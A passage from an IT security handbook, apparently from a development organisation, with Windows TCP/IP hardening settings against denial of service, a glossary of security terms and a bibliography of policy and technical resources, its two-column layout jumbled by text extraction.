are not enabled. Settings to examine include (in \HKEY_LOCAL_MACHINE\CurrentControlSet\Services\Tcpip\Parameters) SynAttackProtect, PART TcpMaxHalfOpen, TcpMaxHalfOpenRetried, FIVE Other kinds of denial of service attacks can be made more difficult by disabling automatic detection and discovery functions. The keys EnablePMTUDiscovery, EnableDeadGWDetect, and EnableICMPRedirects should be set to 0 to prevent the system from responding to unusual network conditions in possibly surprising ways. Interfaces should be directed not to perform automatic router discovery, and should be configured for static routes. 351 A N N E X E S ANNEX 1. GLOSSARY ANNEX 2. HANDBOOK BIBLIOGRAPHY ANNEX 3. ELECTRONIC RESOURCES ANNEX 4. ORGANIZATIONS ANNEX 5. PRINT RESOURCES 352 GLOSSARY ANNEX 1. Attachment GLOSSARY An attachment is a method by which text and images can be sent via e-mail. Any non-text file (a program or 802.11 a picture or a video) is converted ("encoded") into a 802.11 is a set of developing IEEE standards for wireless printable form and inserted into the text message. local area networks (WLAN). The IEEE fosters the Anything stored in your computer is composed of zeros development of standards that often become national and ones. Encoding, in its simplest form, would send and international standards. The organization publishes the zeros and ones as printable characters. a number of journals, has many local chapters, and several large societies in special areas, such as the IEEE Attack Computer Society. For further information on the IEEE An assault on system security from an intelligent threat; and the IEEE Computer Society, see a deliberate attempt to evade security services and http://standards.ieee.org and violate the security policy of a system. http://www.computer.org/. Audit Information about definitions and functional The independent collection of records to access their requirements for 802.11 may be found in this document: veracity and completeness. http://grouper.ieee.org/groups/802/11/Documents/Docu mentArchives/1992_docs/1192091.DOC Audit trail An audit trail is a documented record of events allowing Access an auditor (or security administrator) to reconstruct The ability to enter a secured area and, in the case of past system activities, it may be on paper or on disk. In accessing a computer, to read, write, modify, or use any computer security systems, it is a chronological record of the computer's system resources. of when users log in, how long they are engaged in various activities, what they were doing, whether any Access authorization actual or attempted security violations occurred. Permission granted to users, programs, or workstations. Authentic signature Access control A signature, particularly a digital signature, that can be A set of procedures performed by hardware, software, trusted because it can be verified. and administrators to monitor access, identify users requesting access, record access attempts, and grant or Authenticate deny access. Security policies should be supported by In networking, to verify the identity of a user, device, access control, which assist in the prevention of or any other system entity. unauthorized use of any of a company's system resources either externally (by an intruder) or internally Authentication (by an employee who should not have access). The process of establishing the legitimacy of a node or user before allowing access to requested information. Accountability During the process, the user enters a name or account Ensuring that activities on supported systems can be number (identification) and password (authentication). traced to an individual who is held responsible for the integrity of the data. Authorization Granting officially approved access rights to a user, Assurance process, or program in accordance with a company's A level of confidence that the information system security policy. Usually authorization is completed after architecture mediates and enforces the organization's the user is authenticated. The user may then be security policy. authorized for various levels of access or activity. Information Technology Security Handbook GLOSSARY 353 Availability CERT The portion of time a system can be use for productive The Computer Emergency Response Team was established ANNEX work. at Carnegie-Mellon University after the 1988 Internet worm attack named Morris. Backdoor ONE A way to bypass the normal login security and gain Compromise control of a computer without necessarily obtaining the Violation of a company's system security policy by an owner's consent. If a backdoor is installed on a intruder that may result in the modification, network-attached computer, a person anywhere on the destruction, or theft of data. Internet may be able to gain control of the computer without your knowledge or approval. A backdoor need Computer crime not have malicious intent; e.g. operating systems are Any form of illegal act involving electronic information sometimes shipped by the manufacturer with privileged and computer equipment. accounts for use by field service technicians or the vendor's maintenance programmers. However, they may Computer fraud also be used for intrusion by unauthorized persons. Also A computer crime that an intruder commits to obtain known as a "trap door". money or something of value from a company (or individual). Often, all traces of the crime are covered Backup up. Computer fraud typically involves modification, The process of copying computer files to some other destruction, theft, or disclosure of data. location either on the computer, or on storage devices that may be separated from the computer. Backups allow Confidentiality you to recover data in the event that the originals are Ensuring that sensitive data is limited to specific no longer available, for reasons ranging from accidental individuals (external and internal) or groups within an deletion to physical damage, theft, or other loss. organization. The confidentiality of the information is based on the degree to which an organization must Bandwidth protect its information ­ for example, registered, Capacity of a network or data connection, often proprietary, or nonproprietary. measured in kilobits per second (kbps) for digital transmissions. Conflict-of-interest escalation A preset procedure for escalating a security incident if Buffer Overflow any members of the security are suspect. A software bug that occurs when a program moves data into a space in memory, but there is not enough room Contingency plan in memory to store that data. The program may discard A security plan to ensure that mission-critical computer characters to try to make space for the new data. resources are available to a company in the event of a Destroying these characters can cause all sorts of disaster (such as an earthquake or flood). It includes problems, and often can allow things to happen which emergency response actions, backup operations, and affect the integrity or security of the program. Buffer postdisaster recovery. overflows can be avoided (if you are programming) by checking that there is sufficient spaced in memory Control before doing a move. A protective action that a company takes to reduce its risk of exposure. Bulletin board Allows users from the Internet to write or read messages Cookie posted by other users and to exchange programs and files. A file that is written to or read from your hard disk at the request of a remote web site. The web site requests that the file be written and reads it later. As a simple 354 GLOSSARY example, if you tell a web site what your username is, it Decrypt can request that this information be written to your Conversion of either encoded or enciphered text into disk. When you go back to that web site, it reads the plain text. cookie and knows what your username is. Cookies may be used to generate profiles of web usage habits and, in Dedicated some cases, may infringe on personal privacy. A special purpose device. Although it is capable of performing other duties, it is assigned to only one. Countermeasure An action that a company takes to reduce threats to a Defense in depth system. A countermeasure can be a hardware device, The security approach whereby each system on the software package, procedure, and so on. network is secured to the greatest possible degree. May be used in conjunction with firewalls. Cracker Someone who tries to break the security of, and gain Denial of service access to, someone else's system without being invited. A Denial-of-Service attack is when computers on the (See also hacker). Internet are bombarded with (garbage) messages to such a great extent that they spend all of their time Cryptography responding to these messages. Real user traffic can no The mathematical science that deals with transforming longer get through. data to render its meaning unintelligible, prevent its undetected alteration, or prevent its unauthorized use. Domain Name Server spoofing If the transformation is reversible, cryptography also Assuming the Domain Name Server (DNS) name of deals with restoring encrypted data to intelligible form. another system by either corrupting the name service cache of a victim system or compromising a domain Data-driven attack name server for a valid domain. A form of attack that is encoded in innocuous-seeming data executed by a user or other software to implement E-mail bombs an attack. Data-driven attacks are a serious concern Code that when executed sends many messages to the even to protected systems because they may get same address for the purpose of using up disk space or through firewalls in data form and launch an attack on overloading the e-mail or Web server. the system behind the firewall. Easy access Data Encryption Standard (DES) Breaking into a system with minimal effort by exploiting An encryption standard developed by EBM and then a well-known vulnerability, and gaining superuser access tested and adopted by the National Bureau of in less than 30 seconds (a piece of cake for an Standards. Published in 1977, the DES standard has intruder). proven itself over nearly 20 years of use in both government and private sectors. Eavesdropping Passive secret wiretapping i.e. without the knowledge of Data integrity the originator or the intended recipients of the The assurance that a company's data has not been communication. exposed to modification or destruction either by accident or from malicious acts. E-mail The computer-based equivalent of postal mail ­ Decode e(lectronic)-mail. Properly addressed e-mail can be sent Conversion of encoded text to plain text through the and received by anyone connected to the Internet. From use of a code. the perspective of the Internet, all e-mail is composed of printable text (ASCII) messages. Information Technology Security Handbook GLOSSARY 355 Encryption large quantity of text, images, or code. Even entire The process of scrambling files or programs, changing archives may be compressed; in fact, this is a standard ANNEX one character string to another through an algorithm backup procedure. Examples of compressed archives (such as the DES algorithm). Encryption is a way to include "zip" and "tar" files which can contain very disguise information so that it cannot be read easily, bulky information in a dense form. They are "unzipped" ONE except by the intended recipient. In the simplest case, and individual files may be called up through fairly there is a "key" that is used to disguise that information. simple processes. There are a number of vendors and It can only be read after being decrypted, and to decrypt some freeware available for file compression. it, you would need to know the proper "key". Firewall End-to-end encryption A security system that controls traffic flow between Encryption at the point of origin in a network, followed networks. Several configurations exist: filters (or by decryption at the destination. screens), application relays, encryption, demilitarized zones (DMZ), and so on. Firewalls have two forms: a Environment firewall may be software program running on your The aggregate of external circumstances, conditions, computer or it may be a separate piece of hardware that and events that affect the development, operation, and watches what is being sent and received over a network. maintenance of a system. Firewalls can block transmissions that are unexpected or disallowed. They can also control communications Escalation between you and the outside world. The procedure of reporting (and passing responsibility for resolving) a security breach to a higher level of Gateway command. See also, :Internal escalation," "External A bridge between two networks. escalation," and "Conflict-of-interest escalation." Global System for Mobile Communications (GSM) External escalation GSM is an open, non-proprietary system that is The process of reporting a security breach to an constantly evolving. GSM satellite roaming has extended individual or group outside the department, division, or service access to areas where terrestrial coverage is not company in which it occurred. Once a problem is available. escalated, responsibility for resolving that problem is either accepted or shared with the party to whom the Global Positioning System (GPS) problem is escalated. Used primarily for navigation, this satellite-based system maps the location of various receivers on Earth. Extranet Extranet refers to extending the LAN via remote or Hacker Internet access to partners outside your organization Someone with an interest in computers who enjoys such as frequent suppliers and purchasers. Such experimenting with them. The term has also come to relationships should be over authenticated link to mean a person with malicious intentions who gathers authorized segments of the LAN and are frequently information on computer security flaws and breaks into encrypted for privacy. computers without the system owner's permission, although the term cracker is more appropriate for an Fault tolerance exclusively negative connotation. (See also Cracker). A design method that ensures continued systems operation in the event of individual failures by providing Hacking redundant systems elements. In general, writing code for computers. In a security context, the term often is used to mean exploiting File compression system vulnerabilities to gain unauthorized access. File compression is a means of storing or transmitting a 356 GLOSSARY HTML first configuration involved four computers and was HyperText Mark-up Language tells a web browser or mail designed to demonstrate the feasibility of building program how to display text and images. It can also networks using computers dispersed over a wide area. give other instructions to the browser/mail program. A The advent of open networks in the late 1980's required mark-up language allows commands or instructions a new model of communications. The amalgamation of embedded in the text to be displayed and printed. An many types of systems into mixed environments example of a mark-up language is: demanded better translator between these operating systems and a non-proprietary approach to networking This sentence is <>very<> in general. Telecommunications Protocol/Internet short. Protocol (TCP/IP) provided the best solutions to this. When the sentence is displayed, the words within the Internet Engineering Task Force (IETF) << >> are take as instructions on what to do. As a A public forum that develops standards and resolves result, most of the sentence would be displayed as: This operational issues for the Internet. sentence is very short. Internet Service Provider (ISP) Identification The company through which an individual or Recognizing users on a company's system by using organization receives access to the Internet. Typically, unique names. ISPs provide e-mail service and home-page storage in addition to Internet access. Some ISPs also provide Identity theft offsite data storage and backup services. Identity theft is when someone gathers enough information about you to convince others (such as Intranet banks, stores or governments) that they are you. A company's internal network. Incident-response procedures Intruder Formal, written procedures that detail the steps to be An entity that gains or attempts to gain access to a taken in the event of a major security problem, such as system or system resources without having a break-in. Developing detailed incident-response authorization to do so. procedures before the occurrence of a problem is a hallmark of a well-designed security system. Intrusion detection A security service that monitors and analyzes system Insider attack events for the purpose of finding, and providing real- An attack originating from inside a protected network. time or near real-time warning of, attempts to access system resources in an unauthorized manner. Internal escalation The process of reporting a security breach to a higher Intrusion Detection System (IDS) level of command within the department, division, or A system dedicated to the detection of break-ins or company in which the breach occurred. break in attempts either manually via software expert systems that operate on logs or other information Internet available on the network. A web of different, intercommunicating networks funded by both commercial and government organizations. The International Standards Organization (ISO) Internet had its roots in early 1969 when the ARPANET A group that sets standards for data communications. was formed. ARPA stands for Advanced Research Projects Agency (which was part of the U.S. Department of ISP Defense). One of the goals of ARPANET was research in The company through which an individual or distributed computer systems for military purposes. The organization receives access to the Internet. Typically, Information Technology Security Handbook GLOSSARY 357 ISPs provide e-mail service and home-page storage in Logic bomb addition to Internet access. Some ISPs also provide A program inserted into software by an intruder. A logic ANNEX offsite data storage and backup services. bomb lies dormant until a predefined condition is met; the program then triggers an unauthorized act. Key ONE In encryption, a key is a sequence of characters used to Network computer architecture encode and decode a file. You can enter a key in two A computing architecture in which components are formats: alphanumeric and condensed (hexadecimal). In dynamically downloaded from the network into the the network access security market, "key" often refers client device for execution by the client. The Java to the "token," or authentication tool, a device utilized programming language is at the core of network to send and receive challenges and responses during the computing. user authentication process. Keys may be small, hand- held hardware devices similar to pocket calculators or Network-level firewall credit cards, or they may be loaded onto a PC as copy- A firewall in which traffic is examined at the network protected software. protocol packet level. Keyboard logger Network worm A program that captures everything that is typed on a A program or command file that uses a computer keyboard. The data can be written to disk or sent to network as a means for adversely affecting a system's someone else via the Internet. If a keyboard logger is integrity, reliability, or availability. A network worm may installed on a computer, everything that is entered on attack from one system to another by establishing a the computer, including usernames and passwords, can network connection. The worm is usually a self- be captured, just as if someone was looking over your contained program that does not need to attach itself shoulder while you typed! to a host file to infiltrate the networks. Least privilege Open Source Designing operational aspects of a system to operate Programs that are distributed in source format under with a minimum amount of system privilege. This design conditions that allow free modification and distribution. reduces the authorization level at which various actions Since the source code is available, people can see how are performed and decreased the chance that a process it works and are able to change it. The authors of Open or user with high privileges may be caused to perform Source code often encourage other programmers to unauthorized activities resulting in a security breach. participate in the further development of the programs. Open Source also includes software that is given away Local Area Network (LAN) for free and many Open Source programs, both free and An interconnected system of computers and peripherals, for sale, offer functionality that is similar to proprietary LAN users share data stored on hard disks and can share programs that may costs a substantial amount of money. printers connected to the network. Sometimes Open Source programs are incorporated into fee-based programs in special licensing arrangements. Logging See www.opensource.org and www.fsf.org for additional The process of storing information about events that information. occurred on the firewall or network. Operating system Log processing System software that controls a computer and its How audit logs are processed, searched for key events, peripherals. Modern operating systems, such as Unix, or summarized. Linux, and Windows XP handle many of a computer's basic functions. Log retention How long audit logs are retained and maintained. 358 GLOSSARY Password Policy A secret code assigned to a user, known by the Organizational- level rules governing acceptable use of computer system. Knowledge (and entry) of the user ID computing resources, security practices, and operational and password is often used to authorize that user to procedures. access system resources Privacy Password cracker The protection of a company's data from being read by A software program containing whole dictionaries that unauthorized parties. Safe guards such as encryption tries to match user passwords. can provide a level of assurance that the integrity of the data is protected from exposure. Password sniffing Passive wiretapping, usually on a local area network, to Private Key gain knowledge of passwords. The element of a public/private key pair that is kept secret by the key pair owner. The private key is used to Penetration decrypt messages that have been encrypted by the Successful, repeatable, unauthorized access to a corresponding public key. It is also used to construct a protected system resource. digital signature ­ the document to be signed is hashed using a secure hash algorithm and then the hashed Penetration test value is encrypted using the private key; this process A system test, often part of system certification, in forms the digital signature. which evaluators attempt to circumvent the security features of the system and penetrate various layers of Protocols systems resources. Agreed-upon methods of communications used by computers. Perimeter-based security The technique of securing a network by controlling Public Key access to all entry and exit points of the network. The element of a public/private key pair that can be known by anyone. The public key is used to encrypt Permissions information that is to be intelligible only to the holder The authorized actions a subject can perform with an of the corresponding private key. It is also used to object (i.e. read, write, modify, or delete). decrypt a digital signature in order to compare the decrypted digital signature and the hashed value of the Personal Identification Number (PIN) signed document. A sequence of numbers or letters that serve to authenticate a user to a system or service. A PIN is Reliability similar to a password, but generally pertains to The probability that a system will adequately accomplish completing financial transactions (bank or credit card its tasks for a specific period of time, under the accounts) or physical access to a location rather than expected operating conditions. access to computing resources. Remote Access Point of Contact (POC) The hookup of a remote computing device via The person or persons to whom users and/or system communications lines such as ordinary phone lines or administrators should immediately report a break-in or wide area networks to access network applications and suspected security breach. The POC is the information- information. system equivalent of a 911 emergency line. Risk The probability that a particular vulnerability of a system will be exploited, either intentionally or accidentally. Information Technology Security Handbook GLOSSARY 359 Risk Analysis: The analysis of an organization's Snooping tool information resources, existing controls and computer A program used by an intruder to capture passwords and ANNEX system vulnerabilities. It establishes a potential level of other data. damage in dollars and/or other assets and identifies controls that need improvement. Social engineering ONE An attack based on deceiving users or administrators at Salami Slice the target site. Social engineering attacks are typically A hacker method for the acquisition of funds. A carried out by telephoning users or operators and database of account information is copied. Then on a pretending to be an authorized user to attempt to gain later date all accounts are charged a minimal amount, access to systems illicitly. so as not to arouse suspicion. Spam Scalability (Used as verb, e.g. to spam someone) To The ability to expand a computing solution to support indiscriminately send unsolicited, unwanted, irrelevant, large numbers of users without having an impact on or inappropriate messages, especially commercial performance. advertising in mass quantities. (Used as a noun: spam) electronic "junk mail." Security audit An independent professional security review that tests Spoof and examines a company's compliance with existing To gain access to a system by masquerading as an controls, the results of which enable an auditor to authorized user. recommend necessary changes in security controls, policies, and procedures. Stateful evaluation Methodology using mixture of proxy or filtering Security procedures technology intermittently, depending on perceived A set of detailed instructions, configurations, and threats (or the need for speed). recommendations to implement a company's security policy. Token In authentication, a device used to send and receive Server challenges and responses during the user authentication The control computer on a local area network that process. Tokens may be small, hand-held devices similar controls software access to workstations, printers and to pocket calculators or credit cards. other parts of the network. Total Cost of Ownership (TCO) Smart card A model that helps IT professionals understand and A credit card-sized device with embedded manage the budgeted (direct) and unbudgeted (indirect) microelectronics circuitry for storing information about costs incurred by acquiring, maintaining, and using an an individual. This is not a key or token, as used in the application or a computing system. The TCO normally remote access authentication process. includes training, upgrades, and administration as well as the original purchase price. Snapshot A copy of what a computer's memory (primary storage, Threat specific registers, etc.) contains at a specific point in Any item that has the potential to compromise the time. Like a photograph. A snapshot can be used to integrity, confidentiality, and availability of data. catch intruders by recording information that the hacker may erase before the attack is completed or repelled. 360 GLOSSARY Tiger team User A group of professional security experts employed by a Any person who interacts directly with a computer system. company to test the effectiveness of security by trying to break in. User ID A unique character string that identifies a user. Time bomb A program inserted into software by in intruder that User identification triggers when a particular time is reached or an interval User identification is the process by which a user has elapsed. identifies himself to the system as a valid user. This is not the same as authentication, which is the process of Trap door establishing that the user is who he says he is and has A way to bypass the normal login security and gain a right to use that system. control of a computer without necessarily obtaining the owner's consent. If a backdoor is installed on a User interface network-attached computer, a person anywhere on the The part of an application that the user works with Internet may be able to gain control of the computer directly. User interfaces can be text-driven, such as DOS, without your knowledge or approval. A backdoor need or graphical, such as Windows. not have malicious intent; e.g. operating systems are sometimes shipped by the manufacturer with privileged Username/password accounts for use by field service technicians or the A name and a secret password that identifies a user to a vendor's maintenance programmers. However, they may computer system or a web site. also be used for intrusion by unauthorized persons. Also known as a "back door." Virtual Private Network (VPN) A Virtual Private Network (VPN) is a private connection Trojan horse between two machines that sends private data traffic A computer program that appears to have a useful over a shared or public network, the Internet. VPN function, but also has a hidden and potentially technology lets an organization securely extend its malicious function that evades security mechanisms, network services over the Internet to remote users, sometimes by exploiting legitimate authorizations of a branch offices, and partner companies. system entity that invokes the Trojan horse program. Virus Two-Factor Authentication: Code that is embedded into a computer program. When Two-factor authentication is based on something a user the program is executed, the viral code wakes up. Once knows (factor one) plus something the user has (factor active, a virus can replicate itself, post messages, two). In order to access a network, the user must have destroy data, or degrade system performance. both "factors," just as he/she must have an ATM card and a Personal Identification Number (PIN) to retrieve Virus signature money from a bank account. In order to be Characteristics marks of a virus that are tracked and authenticated during the challenge/response process, fought by security service software vendors. Security users must have this specific (private) information. patches are provided routinely by the most active software vendors, including McAfee, Norton (specifically Universal Resource Locator (URL) their security tools including virus protection and Universal Resource Locator ­ a generalized address to firewalls), and Microsoft, which is working to secure locate something in the Internet. Examples are flaws in its systems and programs.. http://www.infodev.org and mailto:infodev@worldbank.org Information Technology Security Handbook GLOSSARY 361 Vulnerability A flaw or weakness in a system's design, ANNEX implementation, or operation that can be exploited by an intruder to violate the system's security policy. ONE Wireless Equivalent Protocol (WEP) Wireless Equivalent Protocol. It was designed to be implemented over WLANs to offer the same security features as a physical wire: confidentiality, access control, and data integrity. Wireless Local Area Network (WLAN) A wireless network that corresponds to wireless laptops or other mobile devices. Wiretapping An attack that intercepts and accesses data and other information contained in a flow in a communication system. Originally, the term applied to a mechanical connection to an electrical conductor. It now refers to reading information from any medium used for a link or even directly from a node, gateway or switch. Worm A computer program that can run independently, can propagate a complete working version of itself onto other hosts on a network, and may consume computer resources destructively, leading to a denial-of-service on that network, or networks. 362 HANDBOOK BIBLIOGRAPHY ANNEX 2. OECD eGovernment: HANDBOOK BIBLIOGRAPHY http://www.oecd.org/EN/about/0,,EN-about-301- nodirectorate-no-no-no-13,00.html This Annex covers resources that were used and cited in the main text of this document. Additional resources OECD ICT policy: will be listed in Annexes 3, 4, and 5. http://www.oecd.org/EN/home/0,,EN-home-40- nodirectorate-no-no-no-29,00.html Practical Unix & Internet Security, by Simson Garfinkel, Gene Spafford, and Alan Schwartz (O'Reilly & Associates, Global Internet Policy Initiative: Inc.: CA, 2003) http://www.gipiproject.org/ Web Security, Privacy & Commerce, by Simson Garfinkel Center for Democracy and Technology: with Gene Spafford (O'Reilly & Associates, Inc.: CA, http://www.cdt.org/ and also the eGovernment 2002) handbook pages, completed n collaboration with infoDev: http://www.cdt.org/egov/handbook/ IT Security: Risking the Corporation, by Linda McCarthy, Forward by Gene Spafford (Prentice Hall PTR: NJ, 2003) From the text footnotes for Part 1: PART 1 DOT-Force, http://www.dotforce.org/about/ The future of global policy making site : Draft Declaration of Principles, World Summit on the http://www.markle.org/globalpolicy/index.html Information Society, Document Includes the DOT Force Roadmap and the Louder Voices WSIS03/PCIP/DT/4(Rev.3)-E. Study. Moore, Paxson, Savage, Shannon, Staniford and Weaver, Digital Opportunity Taskforce (DOT) reports: "Inside the Slammer Worm," IEEE Security and Privacy, http://www.dotforce.org/teams Vol. 1, No. 4, July/August 2003, pp. 33-39. Includes material on eStrategies: PART 2 http://www.dotforce.org/reports/documents/65/ E-Strategies_e.pdf The IEEE fosters the development of standards that See also plans for the International e-Development often become national and international standards. The Resource Network: organization publishes a number of journals, has many http://www.dotforce.org/teams/IeDRNBusinessPlan.ppt local chapters, and several large societies in special areas, such as the IEEE Computer Society. For further Government guidelines for the development of the information on the IEEE and the IEEE Computer Society, information society: see http://standards.ieee.org and http://www.innovazione.gov.it/eng/documenti/ http://www.computer.org/ linee_guida_eng.shtml Information about definitions and functional OECD Electronic Commerce site: requirements for 802.11 may be found in this document: http://www.oecd.org/EN/home/0,,EN-home-29- http://grouper.ieee.org/groups/802/11/Documents/Docu nodirectorate-no-no-no-29,00.html mentArchives/1992_docs/1192091.DOC OECD Electronic Commerce for Development Study (2002) The Unicode standard was developed to produce http://www.oecd.org/EN/document/0,,EN-document- international software and to process 273-nodirectorate-no-15-36384-29,00.html and render data in most of the world's languages. The following paper presents the background of the Information Technology Security Handbook HANDBOOK BIBLIOGRAPHY 363 development of this standard among vendors and by the http://www.counterpane.com/log-analysis.html contains International Organization for Standardization (ISO). advice and how-to's on The paper describes the design goals and principles. It analyzing system logs. also discusses how an application handles Unicode text. It concludes with a description of some approaches that PART 3 can be taken to support Unicode and a discussion of Microsoft's implementation. Microsoft's decision to use The Human Development Report 2001: Making New Unicode as the native text encoding in its Windows NT Technologies Work for Human Development" (UNDP: NY, (New Technology) operating system is of particular 2001). significance for the success of Unicode. http://research.compaq.com/wrl/DECarchives/DTJ/DTJB0 See a number of works by Glaessner, Kellermann, and ANNEX 2/DTJB02SC.TXT McNevin including "Electronic Safety and Soundness: Securing Finance in a New Age, Public Policy Issues Additional material on the technical aspects of security (October 2003). This Monograph is the culmination of may be found at the following links: efforts over the past three years and builds upon a TW series of papers. These include: "Electronic Security: O The Sans Institute Reading room: Risk Mitigation in Financial Transactions" (May 2002, http://www.sans.org/rr/catindex.php?cat_id=48 June 2002, July 2002), "Electronic Finance: A New Approach to Financial Sector Development?" (2002), and http://www.securityfocus.com "Mobile Risk Management: E-Finance in the Wireless Environment" (May 2002). All papers are available at: http://www.sysinternals.com offers a variety of freeware www.worldbank1.org/finance utilities for monitoring (click on E-security). system usage and handling other aspects of systems security. Further material on research projects and security management products is available at the IT Governance http://www.deter.com/unix/index.htmlm is a Unix Institute (ITGI): www.itgi.org. security page. For information on the cases and programs, see the http://msgs.securepoint.com contains mailing lists for a Information Systems Audit and Control Association at: number of popular security tools. www.isaca.org. One such study featured the country of Uruguay which might be of particular interest to readers http://www.cert.org/tech_tips/unix_configuration_guide of this handbook: http://www.isaca.org/ct_case.htm. lines.html offers Unix configuration guidelines from CERT. COBIT (http://www.isaca.org/cobit.htm, or http://www.itgi.org) is an open source product that http://www.cert.org/tech_tips/win_configuration_guidel provides a reference framework on e-Security for ines.html offers Microsoft Windows configuration management, users, and IS audit, control, and security guidelines from CERT. practitioners. The latest communication from ISACA will give you a good overview of current and future http://www.cert.org/security- developments of the Association: Volume 8 2003 of improvement/modules/m09.html covers CERT guidelines Global Communiqué: on detecting signs of intrusions. http://ISACF:RESEARCH4@www.isaca.org/@member/gco mm/gcv034.pdf http://sites.inka.de/lina/freefire-l/index.en.html is a link to the FreeFire project Due to the rise in security incidents globally, a number for free security software. of consulting firms have been producing reports on IT in an international context. See, for example, Ernst & 364 HANDBOOK BIBLIOGRAPHY Young recently released the 2003 Global Information The following are several examples of recent work security survey: performed by the ICC: http://www.ey.com/global/download.nsf/US/TSRS_Globa l_Information_Security_Survey_2003/$file/TSRS_- a) Electronic Signatures Directive ­ review and response _Global_Information_Security_Survey_2003.pdf to the European Commission review of the Electronic Signatures Directive, which was submitted to the Information on security issues including survey data on European Commission in September 2003. incidents and organizational responses may be found at the Sans Institute: www.sans.org. b) Draft Privacy Toolkit - The Draft Privacy Toolkit develops the broad approach of ICC to the regulation of InfraGard is an information sharing and analysis effort personal data and suggests the best way to protect serving the interests and combining the knowledge base privacy while allowing business to function effectively of a wide range of members. At its most basic level, and continue to innovate. InfraGard is a cooperative undertaking between the U.S. Government (led by the FBI) and an association of c) Draft ICC policy statement on employee privacy, data businesses, academic institutions, state and local law protection and human resources - enforcement agencies, and other participants dedicated This draft policy statement sets out ICC's positions on to increasing the security of United States critical the key issues relating to data protection and human infrastructures. For further information on a wide range resources, and provides recommendations for of security issues, see www.infragard.net. government policy in this area. A second organization focused on a wide range of d) Draft E-terms - E-terms 2004 is ICC's new self- threats to individual. State and national security is the regulatory legal instrument on electronic newly formed Department of Homeland Security in the contracting. The document has been prepared by an United States. The new department's first priority is to informal drafting group. In its current form, the draft protect the nation against further terrorist attacks. model clause is a focused instrument that addresses Component agencies will analyze threats and three identified issues: (i) contract formation; (ii) intelligence, guard U.S. borders and airports, protect confidentiality issues; (iii) evidential value of electronic U.S. critical infrastructure, and coordinate the response records. The clause is limited to issues that are specific of the country for future emergencies. DHS is also for the electronic medium. Thus, E-terms 2004 must be dedicated to protecting the rights of American citizens read in the context of existing conventional contract and enhancing public services, such as natural disaster regulations and rules. assistance and citizenship services, by dedicating offices to these important missions. See, www.dhs.gov. Federal Information System Control Manual (FISCAM) offers technical and policy information at: The FBI has recently published a survey on computer www.gao.gov/special.pubs/ai12.19.6.pdf crime: see www.gocsi.com for the main Computer Security Institute website and http://i.cmpnet.com/ The International Standards Organization (ISO) develops gocsi/db_area/pdfs/fbi/FBI2003.pdf for the Survey itself. standards for the information technology sector worldwide. Its code of practice for information security The ICC is an international body whose membership management, ISO/ IEC 17799, transforms the British includes developing countries, the group is engaged Standard BS 7799, which has been adopted in many with research and exchanges on ICT issues such as, e- countries, into an International Standard and it is Commerce, e-security, privacy, and law in the context of expected to become the reference document for codes the Internet. The ICC web site and related pages may be of good practice to ensure secure and trustworthy found at: http://www.iccwbo.org/home/menu_ e-commerce. See documents posted at www.iso.org. electronic_business.asp Information Technology Security Handbook HANDBOOK BIBLIOGRAPHY 365 ADDITIONAL LINKS FOR PARTS 3 AND 4: 2003 Australian Computer Crime and Security Survey FOCUS ON INTERNATIONAL BUSINESS ISSUES CASES AND LEGISLATION Canadian Criminal Code, Part VI, Invasion of Privacy and Part IX, Offences against rights of property. 1) Implementing e-Government - being ready: http://www.audit.nsw.gov.au/guides-bp/e-govt-BPG.pdf) Claessens Stijn, Glaessner Thomas and Klingebiel is an excellent and simple checklist for governments to Daniela, "E-Finance in Emerging Markets: Is implement e-government (20 pages). Of interest: Leapfrogging Possible?" chapters on privacy, security, and technology and information management (Audit Office of New-South Commission of the European Communities: Network and Wales, Australia) Information Security: Proposal for A European Policy ANNEX Approach- Brussels, June 6, 2001. 2) Case studies on protecting critical infrastructure through network security may be found at: Commission of the European Communities: Creating a http://www.itu.int/osg/spu/ni/security/index.html. Safer Information Society by Improving the Security of TW Korea and Brazil are featured in the Country Examples. Information Infrastructures and Combating Computer- O related Crime ­ eEurope 2002, Brussels, January 26, 2001. 3) "The government's guidelines for the development of the information society", Minister for Innovation and Department of Justice, Canada: Technologies, Rome, June 2002 is an excellent example www.canada.justice.gc.ca/en/cons/la_al/index.html#toc: on a government approach to setting up a plan for ICT Lawful Access ­ Consultation Document. security. See also, http://www.innovazione.gov.it/eng/documenti/ Dr Chae, Kijoon, "Introduction to Critical Network linee_guida_eng.pdf Infrastructures," May 20-22, 2002, Seoul, Korea. which contains an executive summary on Italy's national plan for ICT security. Dr Lim, Chaeho, "Creating Trust in Critical Network Infrastructures: Korean Case Study." May 20-22, 2002, 4) Reference to Global ICT Policy Themes, Issues and Seoul. Venues, including security and privacy may be found at: http://www.markle.org/globalpolicy/ The organization European Union Directive 2000/31/EC - on certain legal focuses on enabling meaningful participation by aspects of information society services, in particular developing-nation stakeholders and features an electronic commerce, in the Internal Market (Directive implementation team on local policy participation from on electronic commerce) the G8 digital opportunity task force, June 2002 European Union Directive 97/33/EC ­ on 5) THE ITU site contains a collection of links to policy Interconnection in Telecommunications. and regulatory web sites: http://www.itu.int/osg/spu/ni/security/links/policy.html European Union Directive 2002/58/EC ­ on privacy and There are also links for development and e-strategy Electronic Communications. issues: http://www.itu.int/ITU-D/e-strategy/internet/ Glaessner, Thomas, Kellerman Tom, and McNevin, The World e-Trust memorandum of understanding: "Electronic Security: Risk Mitigation in Financial http://www.itu.int/ITU-D/e-strategy/MoU/world_e.html, Transactions -Public Policy Issues," June 2002, The and e-Business: A Technology Strategy for Developing World Bank. Countries: http://www.itu.int/ITU-D/e-strategy/publications- Global Dialogue "E-Security: Risk Mitigation in the articles/wmrcjune00/ntoko.html Financial Sector," The World Bank, Integrator Group, September 25, 2002 366 HANDBOOK BIBLIOGRAPHY Goodman E., Seymour, Hassebroek B., Pamela, King, "Security of Internet Enabled Wireless Devices," Wireless Davis and Ozment, Andy, " International Coordination to Task Force Findings, National Security Increase the Security of Critical Network Telecommunications Advisory Committee, January 2003. Infrastructures," May 20-22, 2002, Seoul. Shaw, Robert, "Creating Trust in Critical Network Harrop, Mike, "Creating Trust in Critical Network Infrastructures: The Case of Brazil." May 20-22, 2002, Infrastructures ­Canadian Case Study," May 20-22, 2002, Seoul. Seoul, Korea. The National Strategy to Secure Cyberspace, President's International Telecommunications Union- Critical Infrastructure Board, United States, September Telecommunications Standardization Sector (ITU-T) ­ 2002. Lead Study Group 17 on Communications and Systems Security (www.itu.int/ITU-T/) . "Wireless Security," Wireless Task Force Report, National Security Telecommunications Advisory Committee, Internet Security Alliance ­ Common Sense Guide for January 2003. Senior Managers ­ Top Ten Recommended Security Practices, July 2002. PART 4 Keck, Richard and Satola, David, "Entering the 